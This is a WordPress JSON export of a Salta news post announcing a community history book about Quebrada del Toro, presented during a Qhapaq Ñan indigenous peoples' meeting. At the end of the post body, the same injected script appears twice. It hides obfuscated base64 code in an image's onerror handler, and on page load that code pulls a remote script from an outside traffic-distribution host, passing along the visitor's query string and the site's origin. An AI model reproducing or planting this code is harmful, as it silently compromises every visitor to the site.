{"id":1377,"date":"2022-08-26T18:22:47","date_gmt":"2022-08-26T21:22:47","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1377"},"modified":"2025-08-14T00:37:19","modified_gmt":"2025-08-14T03:37:19","slug":"qhapaq-nan-presentaran-el-libro-quebrada-del-toro-una-historia-local-con-participacion-comunitaria","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1377","title":{"rendered":"Qhapaq \u00d1an: Presentar\u00e1n el libro Quebrada del Toro, una historia local con participaci\u00f3n comunitaria"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#5c4506\"><em>El lunes 29 de agosto, a las 17 hs en el Mercado Artesanal, tendr\u00e1 lugar la presentaci\u00f3n del libro. Se realizar\u00e1 el marco del cierre del Encuentro Federal de la Mesa de Pueblos Ind\u00edgenas del Camino Ancestral Qhapaq \u00d1an.<\/em><\/h4>\n\n\n\n<p>El lunes 29 de agosto, a las 17 hs en el Mercado Artesanal, tendr\u00e1 lugar la presentaci\u00f3n del libro \u00abQuebrada del Toro, una historia local con participaci\u00f3n comunitaria\u00bb. Se trata de una publicaci\u00f3n que compila diversos relatos de las comunidades de la Quebrada, resultado de una propuesta de Turu Yaco, Asociaci\u00f3n Emprendedores de los Cerros &nbsp;&#8211; organizaci\u00f3n de base local dedicada al turismo comunitario- en colaboraci\u00f3n conjunta con el Programa de Turismo Sustentable del NOA y el Museo de Antropolog\u00eda de Salta.<\/p>\n\n\n\n<p>Dicho evento contar\u00e1 con la presencia de la directora Nacional de Gesti\u00f3n Patrimonial, Dra. Viviana Usubiaga; de la lic. Sandra Rodriguez Echaz\u00fa del Museo de Antropolog\u00eda de Salta (autora del libro); de Primitivo Yapura, Presidente de la Asociaci\u00f3n Turu Yaco y de Agust\u00edn Cabezas y Orlando Soriano, Coordinador y T\u00e9cnico Territorial del Programa Turismo Sustentable del NOA respectivamente.<\/p>\n\n\n\n<p>La presentaci\u00f3n se realizar\u00e1 el marco del cierre del &nbsp;Encuentro Federal de la Mesa de Pueblos Ind\u00edgenas del Camino Ancestral Qhapaq \u00d1an.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/qhapaq-nian-presentaran-el-libro-quebrada-del-toro-una-historia-local-con-participacion-comunitaria-84519\" target=\"_blank\" rel=\"noreferrer noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El lunes 29 de agosto, a las 17 hs en el Mercado Artesanal, tendr\u00e1 lugar la presentaci\u00f3n del libro. Se realizar\u00e1 el marco del cierre del Encuentro Federal de la Mesa de Pueblos Ind\u00edgenas del Camino Ancestral Qhapaq \u00d1an. El lunes 29 de agosto, a las 17 hs en el Mercado Artesanal, tendr\u00e1 lugar la [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1378,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,18],"tags":[],"class_list":{"0":"post-1377","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1377"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1377"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1377\/revisions"}],"predecessor-version":[{"id":7377,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1377\/revisions\/7377"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1378"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1377"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1377"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1377"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}